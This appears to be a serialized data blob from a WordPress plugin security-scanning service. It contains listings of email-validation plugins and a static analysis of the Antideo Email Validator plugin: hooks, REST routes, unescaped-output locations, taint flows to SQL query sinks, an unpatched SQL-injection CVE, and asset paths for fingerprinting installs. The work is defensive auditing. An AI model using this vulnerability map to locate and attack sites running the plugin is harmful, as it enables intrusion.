Services\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fclearout.io\u002Femail-finder\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fclearout.io\u002Femail-finder\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fclearout.io\u002Fsales-prospecting\u002Fchrome-extension\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fclearout.io\u002Fsales-prospecting\u002Fchrome-extension\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fclearout.io\u002Fsales-prospecting\u002Fadvanced-data-enrichment\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fclearout.io\u002Fsales-prospecting\u002Fadvanced-data-enrichment\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fclearout.io\u002Freverse-lookup\u002Flinkedin\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fclearout.io\u002Freverse-lookup\u002Flinkedin\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fclearout.io\u002Freverse-lookup\u002Femail\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fclearout.io\u002Freverse-lookup\u002Femail\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n","Block invalid emails like temporary, disposable, etc. with our real-time email verification. Verify email address during form-fill and stop form spam.",600,32575,84,13,"2026-02-18T16:31:00.000Z","4.6",[19,21,82,102,122],"woocommerce","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fclearout-email-validator.3.3.1.zip",99,"2025-03-27 00:00:00",{"slug":127,"name":128,"version":129,"author":130,"author_profile":131,"description":132,"short_description":133,"active_installs":115,"downloaded":134,"rating":72,"num_ratings":50,"last_updated":135,"tested_up_to":77,"requires_at_least":136,"requires_php":79,"tags":137,"homepage":141,"download_link":142,"security_score":124,"vuln_count":26,"unpatched_count":27,"last_vuln_date":143,"fetched_at":29},"reoon-email-verifier","Reoon Email Verifier","2.1.1","Reoon Technology","https:\u002F\u002Fprofiles.wordpress.org\u002Freoon\u002F","\u003Cp>Reoon Email Verifier offers a robust solution for verifying email addresses in real-time, protecting your site from spam registrations and enhancing email campaign effectiveness. With over 99% accuracy, our verification service integrates seamlessly with popular WordPress forms, offering broad compatibility and exceptional reliability.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Key Features:\u003C\u002Fstrong>\u003Cbr \u002F>\n– Check email address during the form submission.\u003Cbr \u002F>\n– Can detect valid, invalid, temporary, catch-all, inbox-full, spamtrap addresses.\u003Cbr \u002F>\n– Quick mode verification checks an email within 0.5 seconds.\u003Cbr \u002F>\n– Dynamic detection of disposable and temporary email addresses.\u003Cbr \u002F>\n– Supports most of the free email providers and business\u002Fprofessional emails.\u003Cbr \u002F>\n– Live API for instant verification during user registration (within 0.5 seconds).\u003Cbr \u002F>\n– Verification mode and custom filters can be selected.\u003Cbr \u002F>\n– GDPR compliant, ensuring user data protection and privacy.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Supported WordPress Forms:\u003C\u002Fstrong>\u003Cbr \u002F>\n– Formidable Form\u003Cbr \u002F>\n– Gravity Form\u003Cbr \u002F>\n– Default WordPress Registration Form\u003Cbr \u002F>\n– WooCommerce Checkout Form\u003Cbr \u002F>\n– Contact Form 7\u003Cbr \u002F>\n– Ninja Forms\u003Cbr \u002F>\n– WPForms\u003Cbr \u002F>\n– Elementor Forms\u003Cbr \u002F>\n– Fluent Forms\u003Cbr \u002F>\n– Forminator Forms\u003Cbr \u002F>\n– HappyForms\u003Cbr \u002F>\n– Mail Mint Form\u003Cbr \u002F>\n– Contact Form by BestWebSoft\u003Cbr \u002F>\n– WordPress Comment Form\u003Cbr \u002F>\n– SureCart\u003Cbr \u002F>\n– WS Form\u003Cbr \u002F>\n– JetForm Builder\u003Cbr \u002F>\n– MetForm\u003Cbr \u002F>\n– BuddyForms\u003Cbr \u002F>\n– EverestForms\u003Cbr \u002F>\n– Bitforms\u003C\u002Fp>\n\u003Cp>To learn about the list of features and detailed benefits, please visit \u003Cstrong>\u003Ca href=\"https:\u002F\u002Fwww.reoon.com\u002Femail-verifier\u002F\" rel=\"nofollow ugc\">Reoon Email Verifier\u003C\u002Fa>\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Ch3>Third-Party Service Usage\u003C\u002Fh3>\n\u003Cp>This plugin integrates with the Reoon Email Verifier service to provide real-time email verification functionality. Through API calls to Reoon Technology’s servers, it verifies email addresses and retrieves account information, using the following endpoints:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>Verify email addresses: https:\u002F\u002Femailverifier.reoon.com\u002Fapi\u002Fv1\u002Fverify?email=[email]&mode=[mode]&key=[your_api_key]\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>By installing and activating this plugin, you consent to the transmission of email addresses to these URLs for the purpose of verification.\u003C\u002Fp>\n\u003Cp>Data Privacy and Security Commitment: We prioritize your privacy and the security of your data. All submitted email addresses are automatically deleted from our servers after 15 days, ensuring that your data is not stored indefinitely. Furthermore, we do not sell or use the submitted emails for marketing purposes. This practice is part of our commitment to maintaining your trust and complying with data protection regulations.\u003C\u002Fp>\n\u003Cp>The use of the Reoon Email Verifier service is subject to Reoon’s Terms of Service and Privacy Policy, available at:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>Terms of Service: https:\u002F\u002Fwww.reoon.com\u002Fterms-and-conditions\u002F\nPrivacy Policy: https:\u002F\u002Fwww.reoon.com\u002Fprivacy-policy\u002F\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>We encourage you to review these documents to understand how Reoon Technology handles and protects your data. It is crucial to ensure that the use of this plugin complies with your website’s privacy policy and any applicable legal obligations concerning data protection and privacy.\u003C\u002Fp>\n","Safeguard your online forms against invalid, temporary, disposable, and harmful email addresses with real-time verification.",6187,"2026-01-18T16:36:00.000Z","4.7",[138,22,102,139,140],"block-spam-registration","form-email-validation","temporary-email-blocker","https:\u002F\u002Fwww.reoon.com\u002Femail-verifier\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freoon-email-verifier.2.1.1.zip","2025-10-09 00:00:00",{"slug":145,"name":146,"version":147,"author":148,"author_profile":149,"description":150,"short_description":151,"active_installs":152,"downloaded":153,"rating":154,"num_ratings":95,"last_updated":155,"tested_up_to":77,"requires_at_least":16,"requires_php":156,"tags":157,"homepage":161,"download_link":162,"security_score":72,"vuln_count":27,"unpatched_count":27,"last_vuln_date":37,"fetched_at":29},"email-validator-for-contact-form-7","Email Validator for Contact Form 7","1.8.1","MailboxValidator","https:\u002F\u002Fprofiles.wordpress.org\u002Fmailboxvalidator\u002F","\u003Cp>This email verification plugin enables Contact Form 7 users to validate email address before sending the form. It uses MailboxValidator email validation service to check if an email address is disposable email address or free email address in order to block invalid email from signing up. You can \u003Ca href=\"https:\u002F\u002Fwww.mailboxvalidator.com\u002Fplans#api\" title=\"MailboxValidator API key sign up\" rel=\"nofollow ugc\">sign up for a free API key\u003C\u002Fa> at mailboxvalidator.com with 300 FREE email validation credits every month!\u003C\u002Fp>\n\u003Cp>Note: Contact Form 7 must be installed and activated before using this MailboxValidator email validation plugin.\u003C\u002Fp>\n\u003Cp>Key Features\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Accurate email verification result.\u003C\u002Fli>\n\u003Cli>Support invalid email validation.\u003C\u002Fli>\n\u003Cli>Support disposable email validation.\u003C\u002Fli>\n\u003Cli>Support free email validation.\u003C\u002Fli>\n\u003Cli>Support role-based email validation.\u003C\u002Fli>\n\u003Cli>Support domain blacklisting.\u003C\u002Fli>\n\u003Cli>Support trusted domain whitelisting.\u003C\u002Fli>\n\u003Cli>Enable you to block the users from message sending if failed in validation.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>This plugin need a MailboxValidator API key to work. You can get it from \u003Ca href=\"https:\u002F\u002Fwww.mailboxvalidator.com\u002Fplans#api\" title=\"MailboxValidator API key sign up\" rel=\"nofollow ugc\">here\u003C\u002Fa>.\u003C\u002Fp>\n","Email validation for Contact Form 7. Reduce registration spam with invalid email, block disposable and block free email.",500,15924,80,"2025-12-10T23:44:00.000Z","5.2.4",[158,21,22,159,160],"contact-form-7","form-validation","mailboxvalidator","https:\u002F\u002Fdeveloper.wordpress.org\u002Fplugins\u002Femail-validator-for-contact-form-7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Femail-validator-for-contact-form-7.1.8.1.zip",{"attackSurface":164,"codeSignals":250,"taintFlows":475,"riskAssessment":567,"analyzedAt":580},{"hooks":165,"ajaxHandlers":233,"restRoutes":234,"shortcodes":247,"cronEvents":248,"entryPointCount":249,"unprotectedCount":27},[166,172,176,180,186,191,194,198,203,207,211,215,218,220,224,228,230],{"type":167,"name":168,"callback":169,"file":170,"line":171},"action","plugins_loaded","loadTextDomain","antideo-email-validator.php",35,{"type":167,"name":173,"callback":174,"file":170,"line":175},"admin_menu","menu",40,{"type":167,"name":177,"callback":178,"file":170,"line":179},"admin_init","settings",41,{"type":181,"name":182,"callback":183,"priority":184,"file":170,"line":185},"filter","plugin_action_links","addActionLinks",10,43,{"type":181,"name":187,"callback":188,"priority":189,"file":170,"line":190},"wpcf7_validate_email","cf7Error",5,47,{"type":181,"name":192,"callback":188,"priority":189,"file":170,"line":193},"wpcf7_validate_email*",48,{"type":167,"name":195,"callback":196,"priority":26,"file":170,"line":197},"frm_validate_entry","formidableError",51,{"type":181,"name":199,"callback":200,"priority":201,"file":170,"line":202},"cntctfrm_check_form","bwsError",11,53,{"type":181,"name":204,"callback":205,"priority":189,"file":170,"line":206},"ninja_forms_submit_data","ninjaError",56,{"type":181,"name":208,"callback":209,"priority":201,"file":170,"line":210},"is_email","isEmail",58,{"type":181,"name":212,"callback":213,"file":170,"line":214},"registration_errors","deaError",59,{"type":181,"name":216,"callback":213,"file":170,"line":217},"user_profile_update_errors",60,{"type":181,"name":219,"callback":213,"file":170,"line":46},"login_errors",{"type":167,"name":221,"callback":222,"file":170,"line":223},"admin_notices","admin_notice",64,{"type":167,"name":225,"callback":226,"file":170,"line":227},"rest_api_init","closure",66,{"type":167,"name":225,"callback":226,"file":170,"line":229},78,{"type":167,"name":221,"callback":231,"file":170,"line":232},"admin_notice_api_key_success",89,[],[235,243],{"namespace":236,"route":237,"methods":238,"callback":240,"permissionCallback":241,"file":170,"line":242},"antideo-email-validator\u002Fv1","disposable_emails\u002F(?P\u003Clast_updated_date>[0-9-]+)",[239],"GET","get_disposable_emails","rest_permission_check",67,{"namespace":236,"route":244,"methods":245,"callback":240,"permissionCallback":241,"file":170,"line":246},"disposable_emails\u002F",[239],79,[],[],2,{"dangerousFunctions":251,"sqlUsage":252,"outputEscaping":254,"fileOperations":27,"externalRequests":50,"nonceChecks":27,"capabilityChecks":189,"bundledLibraries":474},[],{"prepared":14,"raw":27,"locations":253},[],{"escaped":255,"rawEcho":256,"locations":257},119,112,[258,262,264,266,268,270,272,274,276,278,280,282,284,286,288,290,292,294,296,298,300,302,304,306,308,310,312,314,316,318,320,322,324,326,328,330,332,334,336,338,340,342,344,346,348,350,352,354,356,358,360,362,364,366,368,369,372,374,376,378,380,382,384,385,387,389,391,393,395,398,400,402,404,406,407,408,409,411,413,415,417,419,420,422,423,425,426,428,430,432,434,435,437,438,440,441,443,444,446,448,450,452,454,456,458,460,462,464,466,468,470,472],{"file":259,"line":260,"context":261},"about-us.php",269,"raw output",{"file":259,"line":263,"context":261},276,{"file":259,"line":265,"context":261},277,{"file":259,"line":267,"context":261},278,{"file":259,"line":269,"context":261},288,{"file":259,"line":271,"context":261},292,{"file":259,"line":273,"context":261},299,{"file":259,"line":275,"context":261},310,{"file":259,"line":277,"context":261},311,{"file":259,"line":279,"context":261},317,{"file":259,"line":281,"context":261},318,{"file":259,"line":283,"context":261},319,{"file":259,"line":285,"context":261},325,{"file":259,"line":287,"context":261},327,{"file":259,"line":289,"context":261},330,{"file":259,"line":291,"context":261},337,{"file":259,"line":293,"context":261},339,{"file":259,"line":295,"context":261},342,{"file":259,"line":297,"context":261},349,{"file":259,"line":299,"context":261},351,{"file":259,"line":301,"context":261},354,{"file":259,"line":303,"context":261},361,{"file":259,"line":305,"context":261},363,{"file":259,"line":307,"context":261},366,{"file":259,"line":309,"context":261},373,{"file":259,"line":311,"context":261},375,{"file":259,"line":313,"context":261},378,{"file":259,"line":315,"context":261},385,{"file":259,"line":317,"context":261},387,{"file":259,"line":319,"context":261},390,{"file":259,"line":321,"context":261},397,{"file":259,"line":323,"context":261},399,{"file":259,"line":325,"context":261},402,{"file":259,"line":327,"context":261},409,{"file":259,"line":329,"context":261},411,{"file":259,"line":331,"context":261},414,{"file":259,"line":333,"context":261},420,{"file":259,"line":335,"context":261},427,{"file":259,"line":337,"context":261},429,{"file":259,"line":339,"context":261},433,{"file":259,"line":341,"context":261},435,{"file":259,"line":343,"context":261},442,{"file":259,"line":345,"context":261},444,{"file":259,"line":347,"context":261},449,{"file":259,"line":349,"context":261},451,{"file":259,"line":351,"context":261},458,{"file":259,"line":353,"context":261},460,{"file":259,"line":355,"context":261},462,{"file":259,"line":357,"context":261},465,{"file":259,"line":359,"context":261},467,{"file":259,"line":361,"context":261},478,{"file":259,"line":363,"context":261},479,{"file":259,"line":365,"context":261},480,{"file":259,"line":367,"context":261},481,{"file":170,"line":25,"context":261},{"file":370,"line":371,"context":261},"dashboard.php",251,{"file":370,"line":373,"context":261},257,{"file":370,"line":375,"context":261},259,{"file":370,"line":377,"context":261},266,{"file":370,"line":379,"context":261},284,{"file":370,"line":381,"context":261},285,{"file":370,"line":383,"context":261},286,{"file":370,"line":383,"context":261},{"file":370,"line":386,"context":261},287,{"file":370,"line":388,"context":261},298,{"file":370,"line":390,"context":261},300,{"file":370,"line":392,"context":261},302,{"file":370,"line":394,"context":261},304,{"file":396,"line":397,"context":261},"settings.php",391,{"file":396,"line":399,"context":261},405,{"file":396,"line":401,"context":261},407,{"file":396,"line":403,"context":261},410,{"file":396,"line":405,"context":261},413,{"file":396,"line":405,"context":261},{"file":396,"line":405,"context":261},{"file":396,"line":331,"context":261},{"file":396,"line":410,"context":261},416,{"file":396,"line":412,"context":261},419,{"file":396,"line":414,"context":261},421,{"file":396,"line":416,"context":261},437,{"file":396,"line":418,"context":261},446,{"file":396,"line":347,"context":261},{"file":396,"line":421,"context":261},450,{"file":396,"line":351,"context":261},{"file":396,"line":424,"context":261},461,{"file":396,"line":355,"context":261},{"file":396,"line":427,"context":261},470,{"file":396,"line":429,"context":261},473,{"file":396,"line":431,"context":261},474,{"file":396,"line":433,"context":261},483,{"file":396,"line":433,"context":261},{"file":396,"line":436,"context":261},490,{"file":396,"line":436,"context":261},{"file":396,"line":439,"context":261},497,{"file":396,"line":439,"context":261},{"file":396,"line":442,"context":261},504,{"file":396,"line":442,"context":261},{"file":396,"line":445,"context":261},511,{"file":396,"line":447,"context":261},515,{"file":396,"line":449,"context":261},518,{"file":396,"line":451,"context":261},519,{"file":396,"line":453,"context":261},523,{"file":396,"line":455,"context":261},524,{"file":396,"line":457,"context":261},529,{"file":396,"line":459,"context":261},530,{"file":396,"line":461,"context":261},533,{"file":396,"line":463,"context":261},534,{"file":396,"line":465,"context":261},539,{"file":396,"line":467,"context":261},548,{"file":396,"line":469,"context":261},549,{"file":396,"line":471,"context":261},550,{"file":396,"line":473,"context":261},551,[],[476,494],{"entryPoint":477,"graph":478,"unsanitizedCount":26,"severity":493},"activate (antideo-email-validator.php:268)",{"nodes":479,"edges":491},[480,485],{"id":481,"type":482,"label":483,"file":170,"line":484},"n0","source","$_SERVER",290,{"id":486,"type":487,"label":488,"file":170,"line":489,"wp_function":490},"n1","sink","update_option() [Settings Manipulation]",291,"update_option",[492],{"from":481,"to":486,"sanitized":49},"low",{"entryPoint":495,"graph":496,"unsanitizedCount":27,"severity":493},"\u003Cantideo-email-validator> (antideo-email-validator.php:0)",{"nodes":497,"edges":554},[498,501,503,505,507,509,514,516,521,523,528,532,536,538,541,544,546,549,552],{"id":481,"type":482,"label":499,"file":170,"line":500},"$_POST",237,{"id":486,"type":487,"label":488,"file":170,"line":502,"wp_function":490},282,{"id":504,"type":482,"label":483,"file":170,"line":484},"n2",{"id":506,"type":487,"label":488,"file":170,"line":489,"wp_function":490},"n3",{"id":508,"type":482,"label":499,"file":170,"line":500},"n4",{"id":510,"type":487,"label":511,"file":170,"line":512,"wp_function":513},"n5","query() [SQLi]",881,"query",{"id":515,"type":482,"label":499,"file":170,"line":500},"n6",{"id":517,"type":487,"label":518,"file":170,"line":519,"wp_function":520},"n7","get_row() [SQLi]",889,"get_row",{"id":522,"type":482,"label":499,"file":170,"line":500},"n8",{"id":524,"type":487,"label":525,"file":170,"line":526,"wp_function":527},"n9","get_var() [SQLi]",898,"get_var",{"id":529,"type":482,"label":530,"file":170,"line":531},"n10","$_POST (x13)",738,{"id":533,"type":534,"label":535,"file":170,"line":531},"n11","transform","→ save_blocked_email()",{"id":537,"type":487,"label":511,"file":170,"line":512,"wp_function":513},"n12",{"id":539,"type":482,"label":499,"file":170,"line":540},"n13",757,{"id":542,"type":534,"label":543,"file":170,"line":540},"n14","→ get_local_record()",{"id":545,"type":487,"label":518,"file":170,"line":519,"wp_function":520},"n15",{"id":547,"type":482,"label":499,"file":170,"line":548},"n16",802,{"id":550,"type":534,"label":551,"file":170,"line":548},"n17","→ is_disposable_provider()",{"id":553,"type":487,"label":525,"file":170,"line":526,"wp_function":527},"n18",[555,557,558,559,560,561,562,563,564,565,566],{"from":481,"to":486,"sanitized":556},true,{"from":504,"to":506,"sanitized":556},{"from":508,"to":510,"sanitized":556},{"from":515,"to":517,"sanitized":556},{"from":522,"to":524,"sanitized":556},{"from":529,"to":533,"sanitized":49},{"from":533,"to":537,"sanitized":556},{"from":539,"to":542,"sanitized":49},{"from":542,"to":545,"sanitized":556},{"from":547,"to":550,"sanitized":49},{"from":550,"to":553,"sanitized":556},{"summary":568,"deductions":569},"The \"antideo-email-validator\" v1.0.11 plugin presents a mixed security posture. While it demonstrates good practices in SQL query handling with 100% prepared statements and a decent number of capability checks, several concerning areas exist. The output escaping is only 52% properly done, indicating a risk of Cross-Site Scripting (XSS) vulnerabilities in a significant portion of its output. Furthermore, the presence of a historically known, unpatched high-severity CVE, specifically an SQL Injection vulnerability, is a major red flag. The taint analysis shows one flow with unsanitized paths, which, although not critically or highly severe according to the static analysis, could be related to the historical SQL injection issue. The attack surface is relatively small, with no unprotected entry points identified in the static analysis. However, the lack of nonce checks on any entry points, combined with the historical SQL injection vulnerability, suggests a potential for exploitation if the unsanitized flow or the historical vulnerability can be triggered without proper verification. The plugin's history of high-severity SQL injection issues, despite improvements in its current SQL handling, warrants caution.",[570,573,576,578],{"reason":571,"points":572},"Unpatched High Severity CVE (SQL Injection)",18,{"reason":574,"points":575},"Significant proportion of unescaped output (XSS risk)",7,{"reason":577,"points":189},"Flow with unsanitized paths (potential for injection)",{"reason":579,"points":189},"No nonce checks on any entry points","2026-03-16T19:15:44.333Z",{"wat":582,"direct":591},{"assetPaths":583,"generatorPatterns":585,"scriptPaths":586,"versionParams":588},[584],"\u002Fwp-content\u002Fplugins\u002Fantideo-email-validator\u002Fassets\u002Fcss\u002Fstyle.css",[],[587],"\u002Fwp-content\u002Fplugins\u002Fantideo-email-validator\u002Fassets\u002Fjs\u002Fantideo.js",[589,590],"antideo-email-validator\u002Fassets\u002Fcss\u002Fstyle.css?ver=","antideo-email-validator\u002Fassets\u002Fjs\u002Fantideo.js?ver=",{"cssClasses":592,"htmlComments":593,"htmlAttributes":594,"restEndpoints":595,"jsGlobals":598,"shortcodeOutput":599},[],[],[],[596,597],"\u002Fwp-json\u002Fantideo-email-validator\u002Fv1\u002Fdisposable_emails\u002F","\u002Fwp-json\u002Fantideo-email-validator\u002Fv1\u002Fdisposable_emails\u002F(?P\u003Clast_updated_date>[0-9-]+)",[],[],{"error":556,"url":601,"statusCode":602,"statusMessage":603,"message":603},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fantideo-email-validator\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":27,"versions":605},[]]